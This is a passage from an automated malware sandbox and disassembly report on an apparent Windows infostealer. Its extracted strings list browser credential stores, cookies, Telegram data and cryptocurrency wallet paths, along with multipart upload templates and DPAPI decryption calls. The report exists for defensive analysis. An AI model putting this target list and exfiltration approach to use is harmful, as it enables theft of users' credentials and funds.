          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Find$File$CloseFirstNext
          • String ID: Bitcoin$Dash$Dogecoin$Ethereum (UTC)$Exodus Eden$Jaxx$Ledger Live$Litecoin$Local State$Login Data$Opera$Opera Beta$Opera Crypto$Opera Developer$Opera GX$Opera Software\Opera Crypto Stable$Opera Software\Opera Developer$Opera Software\Opera GX Stable$Opera Software\Opera Next$Opera Software\Opera Stable$Opera Unknown$Telegram$UTC--2$Unknown$\Desktop$\Local Extension Settings$\Opera Software\$\Profiles\$\User Data\$com.liberty.jaxx$cookies.sqlite$tdata
          • API String ID: 3541575487-1430340477
          • Opcode ID: 6571cdbd74c24273f05dedc7b1e8df8c17f134a37c760a57b51c44234464d256
          • Instruction ID: 8cbd3f52f4282a9a857ef1fd2ff4f7073ed049c4c0e2595c5793882b891f59fb
          • Opcode Fuzzy Hash: 6571cdbd74c24273f05dedc7b1e8df8c17f134a37c760a57b51c44234464d256
          • Instruction Fuzzy Hash: BF728C7490025ACADB64DB24C851BFAB3B5EF00345F54C1E9DC095B285EF788ECACBA5

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1118 5efb0-5f021 call 5ed70 1121 5f027-5f03a 1118->1121 1122 5f0f0-5f11f 1118->1122 1123 5f040 1121->1123 1124 5f127-5f12d 1122->1124 1125 5f121-5f125 1122->1125 1126 5f042-5f046 1123->1126 1127 5f130-5f13b 1124->1127 1125->1124 1125->1125 1128 5f055-5f059 1126->1128 1129 5f048-5f04c 1126->1129 1127->1127 1130 5f13d-5f146 1127->1130 1134 5f05a-5f05f 1128->1134 1129->1126 1131 5f04e-5f053 1129->1131 1132 5f14e-5f151 1130->1132 1133 5f148-5f14c 1130->1133 1131->1134 1135 5f153-5f15e 1132->1135 1133->1132 1133->1133 1134->1123 1136 5f061-5f0b4 call 5ed70 1134->1136 1135->1135 1137 5f160-5f165 1135->1137 1142 5f0e5-5f0eb 1136->1142 1143 5f0b6-5f0b9 1136->1143 1139 5f167-5f16d 1137->1139 1140 5f16f-5f177 1137->1140 1139->1139 1139->1140 1144 5f17d-5f17f 1140->1144 1145 5f24e-5f2ad call 54790 * 4 1140->1145 1142->1122 1146 5f0c0-5f0c8 1143->1146 1147 5f180-5f18d 1144->1147 1163 5f736-5f73e 1145->1163 1164 5f2b3-5f2b9 1145->1164 1149 5f0d2-5f0d8 1146->1149 1150 5f0ca-5f0d0 1146->1150 1147->1147 1151 5f18f-5f19b 1147->1151 1153 5f0dc-5f0e3 1149->1153 1150->1153 1154 5f1a0-5f1e2 1151->1154 1153->1142 1153->1146 1154->1154 1156 5f1e4-5f1f2 1154->1156 1158 5f1f4-5f24c 1156->1158 1158->1145 1158->1158 1167 5f747-5f74f 1163->1167 1168 5f740-5f742 call 54840 1163->1168 1165 5f72f-5f731 call 54840 1164->1165 1166 5f2bf-5f2c5 1164->1166 1165->1163 1166->1165 1171 5f2cb-5f2cd 1166->1171 1169 5f751-5f753 call 54840 1167->1169 1170 5f758-5f760 1167->1170 1168->1167 1169->1170 1175 5f762-5f764 call 54840 1170->1175 1176 5f769-5f771 1170->1176 1171->1165 1177 5f2d3-5f36d call 5ed70 call 60380 * 3 1171->1177 1175->1176 1180 5f773-5f775 call 54840 1176->1180 1181 5f77a-5f77c 1176->1181 1207 5f376-5f380 1177->1207 1208 5f36f 1177->1208 1180->1181 1184 5f790-5f795 1181->1184 1185 5f77e-5f78e call 60380 1181->1185 1188 5f797-5f7a7 call 60380 1184->1188 1189 5f7a9-5f7b1 1184->1189 1185->1184 1188->1189 1191 5f7c5-5f7d7 call 6048f 1189->1191 1192 5f7b3-5f7c3 call 60380 1189->1192 1192->1191 1210 5f382-5f386 1207->1210 1211 5f388-5f3a5 call 54790 1207->1211 1209 5f370-5f374 1208->1209 1209->1207 1209->1209 1210->1210 1210->1211 1211->1165 1214 5f3ab-5f3af 1211->1214 1215 5f3b7-5f3bb 1214->1215 1216 5f3b1-5f3b5 1214->1216 1217 5f3d5-5f3d9 1215->1217 1218 5f3bd-5f3bf 1215->1218 1216->1215 1216->1216 1219 5f3e6-5f3f0 1217->1219 1220 5f3db 1217->1220 1221 5f3c1-5f3cd 1218->1221 1224 5f3f2-5f400 1219->1224 1225 5f41c-5f426 1219->1225 1223 5f3e0-5f3e4 1220->1223 1221->1221 1222 5f3cf 1221->1222 1222->1217 1223->1219 1223->1223 1226 5f402-5f40e 1224->1226 1227 5f42e-5f432 1225->1227 1228 5f428-5f42c 1225->1228 1226->1226 1229 5f410-5f416 1226->1229 1230 5f434-5f438 1227->1230 1231 5f43a-5f442 1227->1231 1228->1227 1228->1228 1229->1225 1230->1230 1230->1231 1232 5f444-5f44e 1231->1232 1233 5f45e-5f4d8 call 60380 call 5f7f0 * 2 1231->1233 1235 5f450-5f45c 1232->1235 1242 5f4e0-5f51a call 60380 Sleep call 60380 1233->1242 1235->1233 1235->1235 1248 5f520-5f543 call 60380 1242->1248 1249 5f7d8-5f7de 1242->1249 1248->1249 1256 5f549-5f574 call 60380 1248->1256 1251 5f70c-5f71e 1249->1251 1253 5f720-5f723 1251->1253 1254 5f729 1251->1254 1253->1242 1253->1254 1254->1165 1256->1249 1260 5f57a-5f59d call 60380 1256->1260 1260->1249 1264 5f5a3-5f5c2 call 60380 1260->1264 1264->1249 1268 5f5c8-5f5ee call 60380 1264->1268 1268->1249 1272 5f5f4-5f604 call 60380 1268->1272 1275 5f606-5f60a 1272->1275 1275->1249 1276 5f610-5f64e call 60380 1275->1276 1276->1251 1280 5f654-5f65a 1276->1280 1281 5f660-5f663 1280->1281 1282 5f706 1281->1282 1283 5f669-5f6b2 call 60380 * 2 1281->1283 1282->1251 1290 5f6f5-5f700 1283->1290 1291 5f6b4-5f6ca call 60380 1283->1291 1290->1281 1290->1282 1291->1290 1295 5f6cc-5f6f3 call 60380 1291->1295 1295->1290
          APIs
          • Sleep.KERNELBASE(000007D0), ref: 0005F4F4
          Strings
          • aeiou, xrefs: 0005F042
          • oSabnN, xrefs: 0005F100, 0005F127
          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, xrefs: 0005F503
          • ------Boundary%luContent-Disposition: form-data; name="file"; filename="%s.bin"Content-Type: application/octet-stream, xrefs: 0005F2F1
          • ------Boundary%lu--, xrefs: 0005F314
          • Content-Type: multipart/form-data; boundary=----Boundary%lu, xrefs: 0005F337
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Sleep
          • String ID: ------Boundary%lu--$------Boundary%luContent-Disposition: form-data; name="file"; filename="%s.bin"Content-Type: application/octet-stream$Content-Type: multipart/form-data; boundary=----Boundary%lu$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$aeiou$oSabnN
          • API String ID: 3472027048-2317773314
          • Opcode ID: 4109d8752440e91452d4b529e95c2ded1d10b3fd4c65411225332647173b1ba4
          • Instruction ID: 4507a938b5e0fcf04a36145894a30fadec5e06c9bb34a0e81f9534a45e5f959c
          • Opcode Fuzzy Hash: 4109d8752440e91452d4b529e95c2ded1d10b3fd4c65411225332647173b1ba4
          • Instruction Fuzzy Hash: 3122EA30A0425A9BDB619F64CC507FFBBF5AF49301F1441F9E849A7382DA389E898F50
          APIs
          • GetTimeZoneInformation.KERNELBASE(?), ref: 0005D3DD
          Strings
          • %02d.%02d.%4d (%02d:%02d:%02d) UTC: %wS%02d:%02d %wS, xrefs: 0005D51F
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: InformationTimeZone
          • String ID: %02d.%02d.%4d (%02d:%02d:%02d) UTC: %wS%02d:%02d %wS
          • API String ID: 565725191-1913787606
          • Opcode ID: a4f5ad5058cb40ce12dd93e87f0872bd8adf837f7876831854d0c86f85748c9c
          • Instruction ID: dd5aa793e6ab82d75b0d086dc641e47e5602db4e6f93f3e0ac073514078fc7c2
          • Opcode Fuzzy Hash: a4f5ad5058cb40ce12dd93e87f0872bd8adf837f7876831854d0c86f85748c9c
          • Instruction Fuzzy Hash: 1351C5719001689ACB649B58CC417FB73E9FF48300F04C1BBE989A62C1EE399E85CB90
          APIs
          • GetLocaleInfoW.KERNELBASE(?,00000002,?,00000100), ref: 0005D60E
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: InfoLocale
          • String ID: |
          • API String ID: 2299586839-2145946048
          • Opcode ID: c600c69035f0e199130d100ab24c6a923ed3527517112811048da90fb8d9bf6f
          • Instruction ID: ba5f65cec9dd7af5dfd6ece72c174112d3e34f7b9156ef3aa7b2d2ef192369d4
          • Opcode Fuzzy Hash: c600c69035f0e199130d100ab24c6a923ed3527517112811048da90fb8d9bf6f
          • Instruction Fuzzy Hash: B741A331A401198BDB71DF58C841BEBF3F5EB48701F1541ABD809D7280EB749E86CB90
          APIs
          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,7D5DF9B0), ref: 0005A74B
            • Part of subcall function 00054790: malloc.MSVCRT(0006AF98,7D5DF9B0,?,?), ref: 000547D6
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: CryptDataUnprotectmalloc
          • String ID:
          • API String ID: 70552612-0
          • Opcode ID: 047db30e76085f21f425933cd8f8bb6ad2e5371cf3b5142d04442cf227593c46
          • Instruction ID: ab154918b5b672f7bd25c34d17d9b3f6892c408810b6aab32fe6364e46f58b50
          • Opcode Fuzzy Hash: 047db30e76085f21f425933cd8f8bb6ad2e5371cf3b5142d04442cf227593c46
          • Instruction Fuzzy Hash: C1218E75A0820A9FDB14CF98C841BAFFBF9EF49710F10426DE914AB380DB75A9048B91
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: LibraryLoad
          • String ID:
          • API String ID: 1029625771-0
          • Opcode ID: 4bb5743f56291807b706f2734c6577e27766bb71b43da57ad37da98063944a4a
          • Instruction ID: 7d313116a1129664bb56e07ded700b0c2894387d399a0b00bf5077c81095b617
          • Opcode Fuzzy Hash: 4bb5743f56291807b706f2734c6577e27766bb71b43da57ad37da98063944a4a
          • Instruction Fuzzy Hash: 9211E9F1FC036257DB74AF15DC8056F33A7ABA1382710912AFA1A9B151EB3199058B25
          APIs
          • FindFirstFileW.KERNELBASE(00000000,00000001,7D5DF9B0,00000000,00000000,00000001), ref: 0005EF51
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: FileFindFirst
          • String ID:
          • API String ID: 1974802433-0
          • Opcode ID: 821cc1f9d9dac1922d861b16391fffa7a5e2ca96c2d22dc7f789f6fe145ceb13
          • Instruction ID: 994936de7b63b805d4aa93ab046faf19f0046089018ebebe212d85e37ad795e4
          • Opcode Fuzzy Hash: 821cc1f9d9dac1922d861b16391fffa7a5e2ca96c2d22dc7f789f6fe145ceb13
          • Instruction Fuzzy Hash: 8901B171A091549FE714EBA8C801BAFB3A9EB48720F10437AE915E73C0DA396E0487A1
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: fdc2bbb461ac1c3a91730fe0724103491e1ace4a63c365c429ef8ce87993dc62
          • Instruction ID: d341066167898de131a1fe65e3f1ee9abaf4c9eb316ec4782f5f9853a0621c52
          • Opcode Fuzzy Hash: fdc2bbb461ac1c3a91730fe0724103491e1ace4a63c365c429ef8ce87993dc62
          • Instruction Fuzzy Hash: 69029E70600B008BDB68DF29C4917ABB7F2FF84315F10466DE9968B786DB74E949CB90
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b6b88cacc741c7ab8afb9880c199e93aeda8dfe811ec623b8a36b44c48a1d797
          • Instruction ID: afa80f7b1019db4bd924fd96576a312dfc866e563c1ef7bc77014a762bd3cd1b
